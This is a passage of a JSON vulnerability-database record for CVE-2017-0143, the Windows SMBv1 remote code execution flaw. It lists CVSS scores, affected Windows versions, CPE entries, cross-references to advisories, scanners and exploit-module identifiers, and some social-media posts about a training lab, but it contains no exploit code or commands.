"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.2, "vector": "NONE"}}, "hash": "79fd1a8ef762445cbc3425bdfcff7f1dabd0be379d6cbe8c8d3bcfa2c61c8c29", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": 
"1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "2f4290596ecc563b65873431415d8e8a", "key": "references"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 114}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": 
{"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, 
{"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], 
"type": "packetstorm"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 9.2, "vector": "NONE"}}, "hash": "6a944a3f49b5b4b16ff9c7a7ae2facbf58966ec453a2c22a887b2d743c47f025", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5aff40f603b053304da7a131c0db8c3", "key": "references"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", 
"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 47}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "73402198f736fb284b47cab17ac32650"}, {"key": "extraReferences", "hash": "d62415554465cb42c2ec8c5b1a727c7d"}, {"key": "href", "hash": "1b0a551fb9c586414474d37717dc313a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "2f4290596ecc563b65873431415d8e8a"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "f11fa97bbd952a3146ffbddd59276c1d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "922787259791f31412399d00be0fe2f7866a6f4bdd42a89940cb3aa92ee2c004", "viewCount": 314, "enchantments": {"dependencies": {"references": 
[{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.2, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 89, "tweets": [{"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/VulmonFeeds/status/1425347343709257728", "text": "CVE-2017-0143\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; ...\n\nhttps://t.co/qJj60LUVMn?amp=1"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! 
Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": 
